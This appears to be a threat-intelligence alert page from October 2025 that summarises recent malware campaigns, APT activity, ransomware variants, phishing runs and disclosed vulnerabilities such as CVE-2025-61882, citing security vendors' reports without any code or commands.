ALERTS HOME AI APT BOTNET CAMPAIGN CRIME CRYPTOCURRENCY EXPLOIT HACKING GROUP OPERATION PHISHING RANSOM SPAM VIRUS VULNEREBILITY | 2024 2025
2025 January(36) February(50) March(77) April(54) May(54) June(65) July(50) August(54) SEPTEMBER(61) October(43) November(0) December(0)
DATE |
NAME |
INFO |
CATEGORY |
SUBCATE |
| 19.10.25 | Maverick banking trojan | A new campaign reported by Securelist researchers has been leveraging WhatsApp messenger to distribute a new sophisticated banking trojan named Maverick. The attack has been targeting Brazilian users and utilizing .ZIP archives containing malicious LNK files. | VIRUS | |
| 19.10.25 | Purseweb APT delivers updated BeaverTail and OtterCookie variants in the latest campaign | Cisco Talos researchers have identified a new campaign attributed to the Purseweb (aka Famous Chollima) threat group that targets job seekers using fake employment offers. The attackers deploy custom infostealing malware strains including BeaverTail and OtterCookie. | APT | |
| 19.10.25 | Operation Silk Lure delivers ValleyRAT | A spear-phishing campaign dubbed Operation Silk Lure, which targets Chinese HR and hiring teams in fintech, crypto exchanges and trading firms by weaponizing realistic résumés, has been uncovered by Seqrite Labs. Attackers send CVs containing malicious .lnk shortcuts that download a second-stage payload, deploy a script to create a hidden daily scheduled task for persistence, and then RC4-decrypt an in-memory loader that launches the final payload — ValleyRAT. | ALERTS | OPERATION |
| 19.10.25 | Katz Stealer delivered by PhantomVAI loader in a recent campaign | A new campaign leveraging PhantomVAI Loader to distribute information-stealing malware via an evasive, multi-stage infection chain has been reported by the researchers from Unit42. The loader, initially known as Katz Stealer Loader, was primarily used to deliver the Katz Stealer malware but recently has also been noted to deliver a variety of other infostealer variants such as DcRAT, AsyncRAT, XWorm or FormBook. | VIRUS | |
| 19.10.25 | CVE-2025-61882 - Oracle E-Business Suite 0-Day vulnerability | CVE-2025-61882 is a recently disclosed critical (CVSS score 9.8) zero-day vulnerability affecting the Oracle Concurrent Processing product within Oracle E-Business Suite (EBS). | VULNEREBILITY | |
| 19.10.25 | Recent Jewelbug APT activity | Chinese APT group Jewelbug (aka REF7707, CL-STA-0049, Earth Alux) has been highly active in recent months, targeting organizations in South America, South Asia, Taiwan and Russia. One of its intrusions was on the network of a Russian IT service provider and lasted for the first five months of 2025. | APT | |
| 19.10.25 | GhostBat RAT targets RTO Users | An Android malware campaign dubbed GhostBat RAT which impersonates RTO (Regional Transport Office) apps like mParivahan to deceive Indian users, has been reported by Cyble. The malware spreads via WhatsApp and SMS with shortened URLs pointing to GitHub-hosted APKs, as well as through compromised websites. | VIRUS | |
| 19.10.25 | TA585 delivers MonsterV2 via Phishing and Web Injections | A new threat actor dubbed TA585 has been observed conducting phishing campaigns that use tailored email lures, malvertising and web-injection techniques to redirect victims to attacker-controlled sites, sometimes even tagging GitHub users with fake security alerts to boost credibility and click-through rates. The group delivers a range of malware including the newly released MonsterV2, through these campaigns. | GROUP | |
| 19.10.25 | Updated Stealit campaign observed in the wild | The Stealit malware operation has recently upgraded its deployment strategy, incorporating Node.js's Single Executable Application (SEA) feature to distribute malicious payloads. FortiGuard Labs identified this shift following an increase in detections of a particular VB script that facilitates persistence on infected machines. | CAMPAIGN | |
| 19.10.25 | BeFirst Ransomware | BeFirst is a recent MedusaLocker ransomware variant observed in the wild. The malware encrypts user data and appends .befirst1 extension to the locked files. | RANSOM | |
| 19.10.25 | ClayRat Android spyware | A new malicious campaign distributing the ClayRAT Android spyware has been reported by the researchers from Zimperium. The malware employs highly effective social engineering tactics, utilizing fraudulent Telegram channels and phishing websites that mimic legitimate services like Google Photos, WhatsApp, and TikTok to convince the victims to install the malicious application. Once deployed, ClayRat exhibits vast surveillance capabilities. | VIRUS | |
| 19.10.25 | Astaroth banking trojan exploits GitHub | As per reports from McAfee, a new Astaroth campaign has been discovered that weaponizes legitimate GitHub repositories and image files, primarily targeting victims in South America. | VIRUS | |
| 19.10.25 | ChaosBot: Hiding on your system and communicating through Discord | Details regarding a newly identified, Rust-based malware dubbed ChaosBot have been shared by eSentire's Threat Response Unit. According to the report, the actors behind ChaosBot make use of varying methods to gain access to victim environments: | BOTNET | |
| 19.10.25 | Uptick of activity attributed to the RondoDox botnet | Trend Micro reported on renewed malicious activities attributed to the RondoDox botnet. The researchers identified early intrusion attempts, noting that botnet operators quickly leverage publicly disclosed flaws such as CVE-2023-1389 vulnerability affecting TP-Link routers. | ALERTS | BOTNET |
| 19.10.25 | SumUp users targeted with account takeover phishing emails | SumUp Payments Limited is a financial technology company that provides payment and point-of-sale solutions for small businesses and independent merchants. Lately, Symantec has observed phish runs that mimic SumUp and pose as account verification emails, to steal credentials. | PHISHING | |
| 19.10.25 | Latest Chaos Ransomware variant adds new features | The Chaos ransomware variant observed on the threat landscape in 2025 marks a significant evolution according to a latest blog from Fortinet. The malware has transitioned its codebase from .NET to C++ and integrated aggressive destructive extortion tactics alongside the traditional file encryption. | RANSOM | |
| 19.10.25 | Beware of fake 2025 Japan Population census emails | Symantec has detected a new wave of phishing runs targeting Japanese email users with fake 2025 Japan Population census emails. The emails use the subject line: | SPAM | |
| 19.10.25 | APAC Campaign: Malaysian Procurement Lures Load VIP Keylogger In-Memory | Symantec observed a new malspam campaign that is leveraging procurement emails while posing as a well-known Malaysian company specializing in construction and civil engineering, to distribute credential-stealing malware against organizations in Malaysia and beyond. | CAMPAIGN | |
| 19.10.25 | Multi-platform attacks leveraging IUAM ClickFix Generator phishing kit | The popular social engineering technique known as "ClickFix" is being rapidly commercialized according to the latest report from Unit 42 Palo Alto. | PHISHING | |
| 19.10.25 | HiveWare Ransomware | HiveWare is a new ransomware variant recently observed in the wild. The malware encrypts user data and appends .HIVELOCKED extension to the locked files. | RANSOM | |
| 19.10.25 | FoalShell and StallionRAT malware deployed by Cavalry Werewolf APT | Cavalry Werewolf APT has been observed to enhance its malicious toolkit with customized malware. According to the report published by BI.ZONE Threat Intelligence, the threat actors have been conducting phishing campaigns by assuming the identities of personnel from various governmental bodies. | VIRUS | |
| 19.10.25 | VampireBot malware distributed by the BatShadow threat group | Aryaka Threat Research Labs has recently discovered a new campaign conducted by the Vietnamese threat group known as BatShadow. This operation relies heavily on sophisticated social engineering, primarily targeting digital marketers and job applicants. The attackers impersonate recruiters, distributing ZIP archives containing decoy PDF files with malicious executables packed alongside them. | VIRUS | |
| 19.10.25 | Protection Highlight: Symantec Static Data Scanner - Proactive Protection Against DonutLoader with Command-Line Emulation | As the threat landscape continues to evolve, attackers are increasingly relying on sophisticated social engineering techniques to trick users into executing malicious code. These attacks often bypass traditional file-based detection methods, making proactive, behavior-based security measures more critical than ever. | ALERTS | GROUP |
| 19.10.25 | Turkey-Focused Snake Keylogger Campaign Expands Across Sectors and Regions | Symantec recently observed a malspam campaign delivering Snake Keylogger that abused the brand of a prominent Turkish financial institution to lend credibility to fraudulent messages. The emails carried subject lines such as “HESAP EKSTRESI” (account statement). | CAMPAIGN | |
| 19.10.25 | JA Net Bank Phishing Pressures Users with Urgency & Compliance Lures | A phishing campaign is impersonating JAネットバンク (JA Net Bank), using official-sounding messages that cite the 犯罪収益移転防止法 (Act on Prevention of Transfer of Criminal Proceeds) to add credibility. Victims are urged to complete “customer information and transaction purpose” verification or risk account restrictions. | PHISHING | |
| 19.10.25 | SORVEPOTEL: New WhatsApp malware campaign | As per a report from Trend Micro, a new self-propagating Windows malware campaign dubbed SORVEPOTEL is spreading through WhatsApp messages that deliver malicious ZIP attachments. When opened on a desktop, the ZIP extracts a shortcut (.LNK) file that executes hidden PowerShell and batch commands to download payloads, establish persistence, and connect to attacker-controlled servers. | CAMPAIGN | |
| 4.10.25 | ModStealer - a new macOS malware | Security firm Mosyle and follow-up reports detailed the emergence of ModStealer, a cross-platform infostealer distributed via malvertising campaigns, often disguised as fake software downloads or job advertisements. | VIRUS | |
| 4.10.25 | SEO fraud activities conducted by the UAT-8099 threat group | Cisco Talos has published details regarding UAT-8099, a cybercrime group focused on search engine optimization (SEO) fraud and the theft of miscellaneous sensitive data such as credentials, configuration files, logs, and more. This threat group specifically targets vulnerable Internet Information Services (IIS) servers globally, with confirmed victims spanning across universities, technology companies, and telecom providers, among others. | GROUP | |
| 4.10.25 | Confucius Threat Group Deploys New Anondoor Backdoor | The cyber-espionage group Confucius, known for targeting government and critical industries across South Asia has been observed leveraging sophisticated phishing campaigns primarily against high-value targets in Pakistan, showing a major technical evolution. | GROUP | |
| 4.10.25 | ProSpy & ToSpy - Android Spyware in UAE | New spyware campaigns targeting privacy-conscious Android users in the UAE has been reported by ESET. The campaigns deploy two previously undocumented spyware families, ProSpy and ToSpy, disguised as legitimate Signal or ToTok apps distributed via phishing sites and fake app stores. | VIRUS | |
| 4.10.25 | WARMCOOKIE Operators Expand Infrastructure, Refine Tactics | Researchers recently published a report on the WARMCOOKIE backdoor, revealing that its operators have expanded their infrastructure and refined their tactics. First observed in recruitment-themed phishing campaigns, WARMCOOKIE is still active and capable of host fingerprinting, command execution, screenshot capture, and delivery of additional payloads. | ALERTS | OPERATION |
| 4.10.25 | CORS vulns exploited to deliver Latrodectus via injected FakeCaptcha | According to recent reports, Lunar Spider (aka Gold SwathMore) has evolved its toolkit by exploiting CORS misconfigurations on websites—mainly in Europe—to inject a “FakeCaptcha” overlay that tricks victims into running malicious commands. The injected JavaScript creates a fake verification UI, copying a PowerShell command into the clipboard, which, when executed, initiates an MSI loader. | EXPLOIT | |
| 4.10.25 | DarkCloud's infostealer recent activity | A new activity delivering the DarkCloud version 3.2 payload has been reported by the researchers from eSentire. The attack is initiated via targeted spear-phishing campaign with financial lure that delivers the infostealing malware within the .zip archive attachment. | VIRUS | |
| 4.10.25 | GuLoader campaign targets Francophone Businesses, deploying MassLogger | Symantec has observed a new GuLoader campaign in which actors are impersonating a well-known hospitality and luxury resort/events group in Morocco. Sending fraudulent quotation requests with the subject line “DEMANDE DEVIS N° 25090358.” | CAMPAIGN | |
| 4.10.25 | Acreed Infostealer | Acreed is an advanced infostealer variant first discovered in early 2025 and sold on underground markets. Once on the infected machine, Acreed deploys JavaScript modules designed for financial theft, performing cryptocurrency clipping (replacing legitimate wallet addresses on web pages) and clipboard hijacking. | VIRUS | |
| 4.10.25 | New LockBit ransomware variant 5.0 found in the wild | The LockBit ransomware group has resurfaced following a February 2024 disruption, deploying an new variant dubbed LockBit 5.0. A new research published by Trend Micro has confirmed the existence of Windows, Linux, and ESXi variants, signifying the group’s continued cross-platform strategy targeting entire enterprise networks, including virtualized environments. | RANSOM | |
| 4.10.25 | CVE-2025-10035 - Fortra GoAnywhere MFT vulnerability | CVE-2025-10035 is a recently disclosed critical (CVSS score 10.0) deserialization vulnerability affecting Fortra GoAnywhere which is comprehensive managed file transfer (MFT) software. | VULNEREBILITY | |
| 4.10.25 | New Android malware Klopatra | Klopatra is a newly observed Android malware which functions as both a banking Trojan and Remote Access Trojan (RAT). A report provided by researchers at Cleafy shares technical details and campaign activity associated with this threat. Highlights from the report include: | VIRUS | |
| 4.10.25 | Olymp Loader: Emerging Malware-as-a-Service | A new assembly-written Malware-as-a-Service called Olymp Loader advertised as “FUD” (fully undetectable) has been reported by Outpost24. It includes anti-debugging, code-signing and crypter options and targets browsers, Telegram and crypto wallets. | ALERTS | VIRUS |
| 4.10.25 | Rise in Jumbo lottery phishing emails as Halloween nears | Lately, Symantec has observed Halloween themed jumbo lottery phish runs targeting Japanese users. Threat actors have recently initiated jumbo lottery phish runs that masquerade as lottery campaign announcement emails. | PHISHING | |
| 4.10.25 | XWorm RAT uses Excel Add-Ins for Fileless Attack | A malware campaign delivering the XWorm .NET RAT using shellcode hidden inside Office attachments has been observed by Forcepoint. As part of the multi-stage attack, a phishing email is sent with a seemingly benign .xlam workbook that embeds an Ole10Native stream containing encrypted shellcode. | VIRUS | |
| 4.10.25 | New XCSSET Malware variant targets Xcode Projects | Microsoft Threat Intelligence has identified a new variant of XCSSET malware targeting Xcode projects. The malware employs run-only compiled AppleScripts for stealthy execution, now targets a broader range of browsers including Firefox, steals information from Telegram, hijacks clipboards by substituting wallet addresses and establishes persistence via LaunchDaemons and Git commits. | ALERTS | VIRUS |
| 4.10.25 | Oyster backdoor spread via malicious Teams Setup | A recent campaign has been reported by Blackpoint SOC in which attackers are abusing SEO poisoning and malvertising to trick users into downloading trojanized Microsoft Teams installers that deliver the Oyster (also known as Broomstick) backdoor. | VIRUS |